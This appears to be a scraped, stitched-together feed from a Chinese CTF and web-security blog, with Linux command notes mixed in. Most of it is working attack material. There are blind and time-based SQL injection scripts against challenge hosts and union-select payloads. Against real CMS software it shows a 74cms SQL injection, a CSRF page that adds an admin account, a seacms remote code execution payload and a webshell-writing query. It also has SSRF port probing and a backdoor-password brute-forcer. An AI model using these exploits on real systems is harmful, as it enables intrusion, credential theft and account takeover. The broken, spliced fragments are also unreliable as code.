for name in filenames: print(name) with open('/var/www/html/src/'+name) as f: data = f.read() result = pattern.findall(data) for ret in result: try: passwd = re.findall(r"'(.*)'",ret)[0] if'GET'in ret: for com in command: r = requests.get('http://127.0.0.1/src/'+name+'?'+passwd+'='+command) if flag in r.text: print("backdoor in:",name) print("GET:",passwd) break elif'POST'in ret: for com in command: data = { passwd:command } r = requests.post('http://127.0.0.1/src/'+name,data=data) if flag in r.text: print("backdoor in:",name) print("POST:",passwd) except:pass
{"pubkey":"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK\nomh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h\nKk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc\nIC+LX+9V/mpyKe9R3wIDAQAB\n-----END PUBLIC KEY-----","result":true}
-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDMRTzM9ujkHmh42aXG0aHZk/PK omh6laVF+c3+D+klIjXglj7+/wxnztnhyOZpYxdtk7FfpHa3Xh4Pkpd5VivwOu1h Kk3XQYZeMHov4kW0yuS+5RpFV1Q2gm/NWGY52EaQmpCNFQbGNigZhu95R2OoMtuc IC+LX+9V/mpyKe9R3wIDAQAB -----END PUBLIC KEY-----
url = "http://39.100.83.188:8054" headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Union.373' } password = "" s = "_ZzYyXxWwVvUuTtSsRrQqPpOoNnMmLlKkJjIiHhGgFfEeDdCcBbAa9876543210 " for i in range(1,33): for j in s: p = password + j data = { 'username':'union_373_Tom', 'password':"1' or '1' union select 1,'hhx','"+p+"' from admin order by 3,'1" } r = requests.post(url,data=data,headers=headers) r.encoding = r.apparent_encoding if'hhx'in r.text: password = password + j print('password:',password) break
for i in range(16,256): b=hex(i)[2:] a=('89504E470D0A1A0A0000000D49484452000003'+b+'000001530802000000989E251C000000017352474200AECE1CE90000000467414D410000B18F0BFC61050000000970485973000012740000127401DE661F7800000B0349444154785EEDDD4B76A3C81200D0DA80861A6BA89987F5F6BFB3973F10E447266D49B6AAEF9D741982CC48A04F4421E4FA030000000000000000000000000000000000000000000000F0DF743A5F2ED7E47C8A3F9ECE51FC23BC3DF73300FF98D3E5E3EFDFFF2DAEE7B0E97CFD1B7C5C5E56EE62797DC7DA7AEB7A93CBE57CD222FC3E0FBC9FE38DEA1203F0B362EF169AB650DA42554AC2C657766FE7EB92C05B15C553C83BB5BBB5D4FEF2AB3CEE7E5EFEAAF3E13203F06352356A0ADBEBBAB73053A8857F43317CA7DEADB4BCA98A5FD28772D1E5121AD1BFBBB21E7BBC8F776B4CFF3D8FBC9F4FE7D2C0E9DF00F821A57BAB2AD1CBBAB73CFDBB7537E76B28DE87D2CE91BAB71FF6E8FB395F56ED1B003FA334223FD5BDE589DEAC0C8696F3684FA67BFB151E7D3FE7BF74E8DE0078B5FC3DBCDC8884C2963EFB5BBE3A30A876E190F48EFE4770BDDE7B433F076EC3F2B7FEEACF47BBDDDBEE1B82F97B0179A43054DAB655076FB24B9B5A47731B3AD4BDE5314BE4FAF16A73C6F2295D53FE7ECE9F5FA3F93316A3CAFC31EE4E607028D56D0E25E1DD67E7F3ABC8CB1864B7BB9FD3D0EBC0697FB2A4D91E1E94D9CA3EDD1B003F233D16AA2C05AEEDDEFA2FE9C7F7D54AC0AA1319DB977EC7D3EDDED6D96391CC23AC06237482C3C626B9A9DCC6965377E788DCE155AA95B63129E76ACCE3391FBC4653672C24195FE62B118B5E9EC1F154D71CC21165F0E5DC7C7715C17EAEE05EF03A6EBE1CCDB151D9B50D0DE3B5270B009E2B3FBCC8652994ACF46C617996B156BBF45314EBD5477C86541E3F9C9677B7AB1A168ECC03A6D064898CDBFB65B55F983FC261FB61CA20BBF05DF0121B3B8E18D984A68D0773BBE3D604C433D73D2C3FAC290D419830BB3DD8290D414A3A6F28C1FB3C66723E788D26CE584E32B87D23390CBA7457ED650B1B8FA55A72B8C6CEB09C9DCB250FF795556C272CD37DBEE4D238DE961C678E61CD7D107784C8DB9039B25A3F00BCC8D1F7DE62B92B7F5CB52F75A5AAB6AB73D9B2BDA98C79A2CEECBDACE23069FB769425B81AB9CD643AB7FB62BF138ECA52FF5076EC8CDE7B4B93B68D4259E09AE25CCEC7AED1F7CF581AA21E612ED5E1259E5EC5436F92B2AE6AC814B69B286F697307805738DABDF53455AD14CEDE71A52E56BBFACD4DA9B5836176E5B6B7258BC96D0799CEED80F41C2A1E9BAD8FD16E06DD5B49A62DFFFB53FA809CF703260F3863CBB0B77D93A9961CBA63778C573198B05AE0274BBE6DEFFDEF90F3DF4F1407ACC200E05526BBB753FC40707D833D56B5EDB1BD3A57B4D53D753EDD5986B307CD14C3E02A722AB729F123B8A587AB07E9776FA569281F196E9573524EE9D772BE7F8D0E9FB125C9DEECEBDE75DCC954630EDBC35B5F5E45D024330CEE46EE13EB1FBB2C2A5CC2B205005EE570F7965E138A856DD5D4D4BAA26F3525BC04779E570DEA65D62DB7070AF3546E5F3078E3EA6EF736B29CD2E99C0F5CA3E001676CDD7B24B897EA3087E09BAB08F60B090E2E392AD9AE53E52BD82E2CBD8E571D0B002F71B07B2B61E5FDF0B23196EC603D76B68487329DAA727DC0B0D6064DB91D06EF236773FB8A32CE763D77BBB7D0B90EE4533C99F3A16B143CE08CDD967020B893EA3887EFAF22D82F2438B8E4643F570E68D6B5AEB7373D003CD7A1EEADD4AABAFAD535751096847D71A26A5F1EA13E60586BF3AE5435CBCF778273DD5D76CCE7F6057939DB81FADD5B95DBC854CE83E092D2F6FA1E3C63F7938C8384BDCBB853A906A31C1EB08A26B760181C76B4D3E58DE9F07CE076DE24E7D39D1C009EEE50F7167FDC97C3A854E5CDB1BD3A9D95AADCECEA56C7325D6798E5C1CC664F95EA4DD8B11D643EB779EDC91C746FE3647666723E7A8DA6CF587D759266A533A906A31CE656113676979182B77B8E2EB9C8235CCF79DECE61714DFD130300CFD7361C5155ED4A01DE95B154C0EA63978DFB82573E218DC16D9D8C1375668FC155741C266DDF8557A9DEE4496F3BA6731B0A23A5DF1A567E2CD2EB5A719C6D7AFDD33B4A263A9D37BF7C6422E7185A472E87EF13387CC652643CBCFA8070B910DDB9F6E38E4EEF2887B955A48DED8469FBD76E9222C75FAFF13F9DA3724AED5505809738D4BDC56A15C2629DFB08252D7E0F30FE39FDAED5EAD83532FEC6D51C9A86CA8734A5B094C9EEECF95DF5ED8C7184CF525D851DF1F0CD8EC9DC866EE3C424E33039D5BC653F4A4C2F6ECF137EDCBEA1B81D24ED8B723EDB118EE7BC466ECF588C8BF1DB933671C6E2A04B93B464B9E6530F703CD53B39CCAEE2E13749B6594B7B50392DF52400F022C7BAB750AFCE4B69CCE2BE5CC39A2256FDDB4AA17C9F536CFC731D9B271ACDDE4C7AEDD6DF1C5C7E5E750BF34C6E63CBBF4C50496FDA97909BCD3728AB95C6E56D9209623B523DE89AC8F9E0359A3B6339CB3C60168EED2E34389CEA3087F9553CFE2689D28C61D72EEB55CEA7BF0F007E97F87BF06FDF04BCAB842EB1BD121EE4B25A6DAD6A6D19E8D0ACC794013FC9ED736598A86C19B91794F74565435709F93CE77DDCC394618F0C5C023F4FF58EFD101D4FBE49727F364A7A7931AEFC0800FFA2580C43C16B1E72E422596D1E3E29798E516EBFD91BE5FCA4549F7B9384D1EFF4676149EF76C300C0ACF2F96CAFDEA55DB116DE3E317C6DF77627B75FEB8D727E56AA4FBD49C6832F9F23BFD90D030063A1ECE5DFB35A7E8EE56E79176AF8242314C48F8F4D357C5261FE4A6E3FED8D727E71AA4FBA4982F2B0B09F73DCD97B391100DE56ACA9A1F2B566EADD930AF3C1DC4EF1DFD61C7BED1397879CCFD77871AA4FB84996C7C0C153DA4200F8A54EF1894BFA97C58BEB65F005C5A1F42C2E1CF7F0FA7928B73CFBD0AB1F783DE07CBECA4B537DC24DB25CF9D1376A01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FE4BFEFCF93F29520FC4D05FB0A10000000049454E44AE426082').decode("hex") f=open('1\\'+b+'.png',"wb") f.write(a) f.close()
from hashlib import sha256 sssk=string.printable text2="sha256_is_too_" text1="6348306011488e60120a6b99fbbb13f09336235fb790f8f904e97846b1418e48" #sha256_is_too_e@$Y for i1 in sssk: for i2 in sssk: for i3 in sssk: for i4 in sssk: text3=text2+i1+i2+i3+i4 if sha256(text3).hexdigest()==text1: text4=i1+i2+i3+i4 print i1+i2+i3+i4 break else: continue else: continue break else: continue break else: continue break print text3
#将相应表项加1 sout_table[Si*16+So]=sout_table[Si*16+So]+1 sout_text[Si*16+So]=sout_text[Si*16+So]+str(Se1).zfill(2) ''' for i in range(0,64): s=str(i)+" : " for j in range(0,16): s=s+str(sout_table[i*16+j])+" " print(s) ''' #print(sout_text[a*16+b]) return sout_text[a*16+b]
url = "http://39.106.224.151:52105/" database = "" s = "0123456789qwertyuiopasdfghjklzxcvbnm!@#$%^&*()QWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(1,50): for j in s: data = { 'username':"' ^ 1 and substr(database(),%d,1)='%s' and pow(9999,100)#"%(i,j), 'password':'123' } print("checking",j) r = requests.post(url,data=data) r.encoding = r.apparent_encoding if'数据库操作失败'in r.text: passwd = passwd + j print("passwd:",passwd) f = 1 break if j == 'M'and f == 0: break f = 0
url = "http://39.106.224.151:52105/" password = "" s = "0123456789qwertyuiopasdfghjklzxcvbnm!@#$%^&*()QWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(1,50): for j in s: data = { 'username':"' ^ 1 and substr((select `2` from (select 1,2 union select * from user)a limit 1,1),%d,1)='%s' and pow(9999,100)#"%(i,j), 'password':'123' } print("checking",j) r = requests.post(url,data=data) r.encoding = r.apparent_encoding if'数据库操作失败'in r.text: password = password + j print("password:",password) f = 1 break if j == 'M'and f == 0: break f = 0
//key建议为8位字符串 var $eancrykey = ''; var $cookie_expiration= 7200; var $cookie_name = 'ddctf_id'; var $cookie_path= ''; var $cookie_domain= ''; var $cookie_secure= FALSE; var $activity = "DiDiCTF";
从响应结果来看,说明session_read方法返回true,说明符合了前面的所有条件,那么最后要得到key,需要的条件为POST一个参数nickname,该参数与key加入一个数组$arr,通过遍历该数组对字符串Welcome my friend %s进行字符替换,由于参数nickname为数组第一个元素,所以第一个替换的为nickname的值,替换一次后,要想再替换上key,则nickname的值中必须包含%s,所以,最终得到key的payload如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
POST /app/Session.php HTTP/1.1 Host: 117.51.158.44 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 didictf_username:admin User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Cookie:ddctf_id=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22495e31ab571f67c3c4ec41915d106c08%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22202.101.138.82%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F73.0.3683.86+Safari%2F537.36%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D476e0efa4918bdfe3b0bbfdf499e75ac Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 11
password = "12345678" for i in range(1000,1101): name = "test" name = name + str(i) url = "http://117.51.147.155:5050/ctf/api/register?name=%s&password=%s"%(name,password) r = requests.get(url) print(r.text)
defget_flag_handler(args): if session['num_items'] >= 5: trigger_event('func:show_flag;' + FLAG()) # show_flag_function has been disabled, no worries trigger_event('action:view;index')
try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception')
if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__': print(decryption(sys.argv[1].encode()))
题目给出的hint:WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)
猜测后台sql语句为WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET['id']) AND display = 1)
获得查询列数payload:
1
0) order by 3--
查询列数为3
获得表名payload:
1
0) union select group_concat(name),2,3 from sqlite_master--
表名为:flag
获得表结构payload:
1
0) union select group_concat(sql),2,3 from sqlite_master--
结构:CREATE TABLE flag (content varchar(100), display int(1), id int(10))
获得flag payload:
1
0) union select content,2,3 from sqlite_master--
Login portal 2
同样试一下username=admin'#&password=,返回Wrong username / password.看样子,注释符好像没有被过滤,因为按照前面几关套路,如果过滤提示的是非法字符,那么既然没过滤注释符的话,那就说明用户名admin不存在,那么老套路username=admin' or 1 or ',返回Wrong password for impossibletoguess.
1%252527%252520order%252520by%2525203-- plain: 1' order by 3--
列数为3
爆表名payload:
1 2
0%252527%252520union%252520select%2525201%25252Cgroup_concat%252528name%252529%25252C3%252520from%252520sqlite_master-- plain: 0' union select 1,group_concat(name),3 from sqlite_master--
表名:random_data
爆表结构payload:
1 2
0%252527%252520union%252520select%2525201%25252Cgroup_concat%252528sql%252529%25252C3%252520from%252520sqlite_master-- plain: 0' union select 1,group_concat(sql),3 from sqlite_master--
结构:CREATE TABLE random_data (id int, message varchar(50), display int)
爆flag payload:
1 2
0%252527%252520union%252520select%2525201%25252Cgroup_concat%252528message%252529%25252C3%252520from%252520random_data-- plain: 0' union select 1,group_concat(message),3 from random_data--
url = "http://challenges.ringzer0team.com:10291?id=" right = "The beautiful goat will be forsaken. In the city of the mountain, a goat of the mountain will rise. The goat of the day will court the count of war." database = "" table_name = "" column_name = "" flag = "" ID = "" quote = "" f = 0
#注数据库名:sqli291_2 for i in range(1,50): for j in range(33,127): payload = "1 and if(ascii(substr(database(),%d,1))=%d,1,0)"%(i,j) r_url = url + payload print(r_url) r = requests.get(r_url) if right in r.text: database = database + chr(j) print(database) f = 1 break if j == 126and f == 0: break else: f = 0
print("database:",database)
#注表名:prophecies for i in range(1,50): for j in range(33,127): payload = "1 and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d,1,0)"%(i,j) r_url = url + payload print(r_url) r = requests.get(r_url) if right in r.text: table_name = table_name + chr(j) print(table_name) f = 1 break if j == 126and f == 0: break else: f = 0 print("table_name:",table_name)
#注列名:id,quote for i in range(1,50): for j in range(33,127): payload = "1 and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='prophecies'),%d,1))=%d,1,0)"%(i,j) r_url = url + payload print(r_url) r = requests.get(r_url) if right in r.text: column_name = column_name + chr(j) print(column_name) f = 1 break if j == 126and f == 0: break else: f = 0 print("column_name:",column_name)
for i in range(1,50): for j in range(48,123): print('checking',chr(j)) data = { 'username':"admin' and if(ascii(substr((select password from users),%d,1))=%d,1,0) or '"%(i,j), 'password':'123' } r = requests.post(url,data=data,headers=headers) if right in r.text: password = password + chr(j) print("password:",password) f = 1 break if j == 122and f == 0: break else: f = 0
for i in range(1,50): for j in range(48,123): print('checking',chr(j)) data = { 'username':"admin' and substr((select password from users),%d,1)='%s' or '"%(i,chr(j)), 'password':'123' } r = requests.post(url,data=data,headers=headers) if right in r.text: password = password + chr(j) print("password:",password) f = 1 break if j == 122and f == 0: break else: f = 0
print("password:",password)
#password: 4dm1nzP455
登录成功后获得flag
Internet As A Service
看别人提示的payload:
1
?s=1' || 1e0union select schema_name,2,3 from information_schema.schemata%23
没搞得太懂,1e0union貌似是为了绕过%20union的过滤
数据库名:iaas
注表payload:
1
?s=1' || 1e0union select table_name,2,3 from information_schema.tables where table_schema like 'iaas'%23
表名:iaas,rz_flag
注列payload:
1
?s=1' || 1e0union select column_name,2,3 from information_schema.columns where table_name like 'rz_flag'%23
列名:flag
1
?s=1' || 1e0union select flag,2,3 from rz_flag%23
Login portal 4
这题不论用户名是否存在,密码错误都会返回Invalid username / password.尝试用户名username=admin' or '1,提示非法字符,猜测过滤了or+空格+任意字符,可以用||代替or
这题只能用延时注入,payload如下:
1
username=' || if(ascii(substr((select password from users),1,1))=100,sleep(3),1) || '&password=1
for i in range(1,50): for j in range(48,123): print("checking",chr(j)) data = { 'username':"' || if(ascii(substr((select password from users),%d,1))=%d,sleep(5),1) || '"%(i,j), 'password':'1' } try: r = requests.post(url,data=data,headers=headers,timeout=4.5) except: password = password + chr(j) print("password:",password) f = 1 break if f == 0and j == 122: break f = 0
POST searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
可以发现,我们添加的影片内容,在/detail/?1.html下可以访问,那么老样子,直接搜索关键字v_pic,在101行中搜索到:$v_pic=$row['v_pic'];,跟踪变量$row,在23行中搜索到:$row=$dsql->GetOne("Select d.*,p.body as v_playdata,p.body1 as v_downdata,c.body as v_content Fromsea_datad left joinsea_playdatap on p.v_id=d.v_id left joinsea_contentc on c.v_id=d.v_id where d.v_id='$vId'")
s = requests.Session() url = "http://47.103.43.235:82/web/a/index.php" r = s.get(url) soup = BeautifulSoup(r.text,'lxml') a = re.findall('<p>(.*)</p>',str(soup.find_all('p')[1]))[0] result = eval(a)
data = { 'result':result } r1 = s.post(url,data=data) print(r1.text)
from base64 import b64decode from urllib import unquote
s = 'Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0xVmpKS1NHVkVRbUZXVmxsM1ZqQmFTMlJIVmtkWGJGcHBWa1phZVZadGVGWmxSbGw1Vkd0c2FsSnRhRzlVVm1oRFZWWmFkR05GZEZSTlZXdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbXRXTVhCRlZXeHdWMDFFUlRCV2Fra3hVakZhV0ZOcmFGWmlhMHBYV1d4b1UwMHhWWGhYYlhSWFRWWndNRlZ0ZUZOVWJVWTJVbFJDVjJFeVRYaFdSRVpyVTBaT2NscEhjRk5XUjNob1YxZDRiMVV4VWtkWGJrNVlZbGhTV0ZSV1pEQk9iR3hXVjJ4T1ZXSkdjRlpXYlhoelZqRmFObEZZYUZkU1JYQklWbXBHVDFkV2NFZGhSMnhUWVROQ1dsWXhXbXROUjFGNVZXNU9hbEp0VWxsWmJGWmhZMnhXY1ZKdFJsUlNiR3cxVkZaU1UxWnJNWEpqUm1oV1RXNVNNMVpxU2t0V1ZrcFpXa1p3VjFKWVFrbFdiWEJIVkRGa1YyTkZaR2hTTW5oVVdWUk9RMWRzV1hoWGJYUk9VbTE0V0ZaWGRHdFdNV1JJWVVac1dtSkhhRlJXTUZwVFZqRndSMVJ0ZUdsU2JYY3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5TUmxweFUydGFiRlpzU2xwWlZWcHJZVWRGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU2MxWnRkRmRpVlhCNVdUQmFjMWR0U2tkWGJXaGFUVlp3ZWxreU1VZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpyWWtad2VGVnRkREJWTWtwSVZXcENXbFpXY0hKWlZXUkdaVWRPU0U5V2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTVc5bGJHUllaVWM1YVUxWFVucFdNV2h2VjBkS1dWVnJPVlppVkVVd1ZqQmFZVmRIVWtoa1JtUnBWbGhDU2xkV1ZtOVVNVnAwVW01S1QxWnNTbGhVVlZwM1ZrWmFjVkp0ZEd0V2JrSkhWR3hhVDJGV1NuUlBWRTVYVFc1b1dGbFVRWGhUUmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUjNSb1lsVndWMWx1Y0V0V2JGbDZZVVJPV21FeVVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVjFsc2FFTldSbXhaWTBaa2EwMVdjREJaTUZZd1lWVXhXRlZyYUZkTmFsWlVWa2Q0UzFKc1pIVlRiRlpYWWtoQ05sWkhlR0ZaVm1SR1RsWmFVRlp0YUZSWmJGcExVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYlVaVlZteHdNMVpyV21GalZrcDFXa1pPVGxacmIzZFhiRlpyWXpGVmVWTnNiRnBOTW1oWVZGWmFTMVZHY0VWU2EzQnNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdibEpzVTBkU2NGVnFRbmRXTVZsNVpFaGtWMDFFUmpGWlZWSlBWMjFGZVZWclpHRldNMmhJV1RKemVGWXhjRWRhUlRWT1VsaENTMVp0TVRCVk1VMTRWVzVTVjJFeVVtaFZNRnBoVmpGc2MxcEVVbGRTYlhoYVdUQmFhMWRHV25OalJteGFUVVpWTVZsV1ZYaFhSbFp6WVVaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlXV3RvUTFkV1draGtSMFpvVFdzMWVsWXlOVk5oTVVsNVlVWm9XbFpGTlVSVk1WcHJWbFpHZEZKc1drNVdNVWwzVmxkNGIySXhXWGhhUldob1VtMW9WbFpzV25kTk1XeFdWMjVrVTJKSVFraFdSM2hUVlRKRmVsRllaRmhpUmxweVdYcEdWbVZXVG5KYVIyaE9UVzFvV1ZaR1l6RlZNV1JIVjJ4V1UyRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQktWVmMxYjFZeFdqWlNWRUpoVWtWYWNsVnFTa3RUVmxKMFlVWk9hR1ZzV2pSV2JUQjRaV3N4V0ZadVRsaGlSMmh4V2xkNFlWWXhVbGRYYlVaWFZteHdlbGxWYUd0V2F6RldWbXBTVjJKWVFtaFdiVEZHWkRGYWRWUnNWbGRTVlhCVVYxZDBWbVF5VVhoV2JGSlhWMGhDVkZWV1RsWmxiRXBFVmxod1UxRlRWWHBTUTFWNlVrRWxNMFFsTTBRJTNE'
whileTrue: while'%'in s: s = unquote(s) try: s = b64decode(s) except: break print s
defget_database(s,url,token): database = "" flag = 0 for i in range(1,20): for j in range(95,123): data = { 'tag[0 or if(ascii(substr(database(),%d,1))=%d,sleep(3),0)]'%(i,j):'1', 'token':token } start = time.perf_counter() s.post(url,data=data) end = time.perf_counter() t = end - start if t >= 3: database = database + chr(j) flag = 1 break if j == 122and flag == 0: break flag = 0 print("database:",database)
SELECT "<?php phpinfo(); ?>" INTO outfile "E:\php\PHPTutorial\WWW\emlog\shell.php";如果网站数据库的配置secure_file_priv为空,那么我们就可以直接在网站根目录下写入webshell
我们先随意备份一个数据库文件,然后加入上述语句,上传
结果出现了报错信息The MySQL server is running with the --secure-file-priv option so it cannot execute this statement说明数据库配置secure_file_priv为null,并且我们无法通过SQL语句改变该配置值,在数据库中验证show global variables like '%secure%';
realname=123&sex=%C4%D0&birthday=111111&addresses=12312332&mobile=18912345678&phone=254221&qq=12345&msn=123%df',`profile`=(select pwd from 74_admin) where uid=1#&profile=123&Submit=%B1%A3%B4%E6
companyname=1234&nature_cn=%B9%FA%C6%F3&nature=46&trade_cn=%BC%C6%CB%E3%BB%FA%C8%ED%BC%FE%2F%D3%B2%BC%FE&trade=1&district_cn=%B5%D8%C7%F81+%2F+%B5%D8%C7%F81%D7%D3%C0%E0&district=1&sdistrict=2&scale_cn=20%C8%CB%D2%D4%CF%C2&scale=80®istered=123¤cy=%C8%CB%C3%F1%B1%D2&contact=123&telephone=1234567&email=123%40123.com&website=%df',`contents`=database() where uid=2#&address=123&contents=123&Submit=%B1%A3%B4%E6
<!DOCTYPE html> <html> <head> <title>404 Not Found</title> </head> <body> <h1>Not Found</h1> <p>The requested URL /info.php was not found on this server.</p> <script> functionadd() { var xmlhttp = new XMLHttpRequest(); var xmldata = 'admin_name=test2&email=1234%40123.com&password=123456&password1=123456&rank=123&submit3=%CC%ED%BC%D3'; xmlhttp.open('POST','http://127.0.0.1/74cms/admin/admin_users.php?act=add_users_save',true); xmlhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xmlhttp.withCredentials='true'; xmlhttp.send(xmldata); } add(); </script>
root@ubuntu:/tmp# ls -dl test* drwxr-xr-x 2 root root 4096 Mar 7 06:07 test drwxr-xr-x 2 root root 4096 Mar 7 18:11 test1 root@ubuntu:/tmp# ls test1 root@ubuntu:/tmp# cp test test1 cp: omitting directory `test' root@ubuntu:/tmp# cp -r test test1 #-r:如果是目录的复制需要加上-r的选项 root@ubuntu:/tmp# ls test1 test root@ubuntu:/tmp# ls test1/test bashrc bashrc1 bashrc2
3.文件或目录的删除命令:rm命令
1 2 3 4 5 6 7 8 9
root@ubuntu:/tmp# rm test2 rm: cannot remove `test2': Is a directory root@ubuntu:/tmp# rm -r test2 #当删除目录时,需要加上-r选项 root@ubuntu:/tmp# ls -dl test* drwxr-xr-x 2 root root 4096 Mar 7 06:07 test drwxr-xr-x 3 root root 4096 Mar 7 18:12 test1
root@ubuntu:/tmp# rm -ir test #加入-i选项,删除前会询问操作者是否操作,避免误删除 rm: descend into directory `test'? ^C #按下[ctrl]+c中断删除操作
head [-n number] 文件 root@ubuntu:~# head /etc/manpath.config #默认显示前十行 root@ubuntu:~# head -n 20 /etc/manpath.config #显示前二十行 root@ubuntu:~# head -n -100 /etc/manpath.config #后一百行不会显示出来
A :当设定了 A 这个属性时,若你有存取此档案(或目录)时,他的访问时间 atime 将不会被修改,可避免I/O较慢的机器过度的存取磁盘。这对速度较慢的计算机有帮助 S :一般档案是异步写入磁盘的(原理请参考第五章sync的说明),如果加上 S 这个 属性时,当你进行任何档案的修改,该更动会『同步』写入磁盘中。 a :当设定 a 之后,这个档案将只能增加数据,而不能删除也不能修改数据,只有root 才能设定这个属性。 c :这个属性设定之后,将会自动的将此档案『压缩』,在读取的时候将会自动解压缩, 但是在储存的时候,将会先进行压缩后再储存(看来对于大档案似乎蛮有用的!) d :当 dump 程序被执行的时候,设定 d 属性将可使该档案(或目录)不会被 dump 备份 i :这个 i 可就很厉害了!他可以让一个档案『不能被删除、改名、设定连结也无法 写入或新增资料!』对于系统安全性有相当大的帮助!只有 root 能设定此属性 s :当档案设定了 s 属性时,如果这个档案被删除,他将会被完全的移除出这个硬盘 空间,所以如果误删了,完全无法救回来了喔! u :与 s 相反的,当使用 u 来配置文件案时,如果该档案被删除了,则数据内容其实还 存在磁盘中,可以使用来救援该档案喔!
]]>
Linux
Linux的文件权限与目录配置https://Foxgrin.github.io//posts/26833/2019-03-06T10:16:00.000Z2019-03-14T12:00:06.873ZLinux一般将文件可读写的身份分为3个类别,分别是拥有者(owner),所属群组(group),其他人(others),且三种身份各有读(read),写(write),执行(execute)等权限。
]]>
Linux
文件上传漏洞--upload-labshttps://Foxgrin.github.io//posts/49857/2019-03-02T14:05:00.000Z2019-03-05T12:03:57.574Z文件上传练习靶场–upload-labs通关记录以及对文件上传漏洞的总结
if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
<?php function__autoload($className){ include $className; }
$controllerName = $_GET['c']; $data = $_GET['d'];
if (class_exists($controllerName)) { $controller = new $controllerName($data['t'], $data['v']); $controller->render(); } else { echo'There is no page with this name'; }
如果响应结果为:There was an error: file_get_contents(http://127.0.0.1:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2则说明存在SSH服务
如果检测一个不存在端口?img=http://127.0.0.1:30,则响应There was an error: file_get_contents(http://127.0.0.1:30): failed to open stream: Connection refused,说明服务不存在
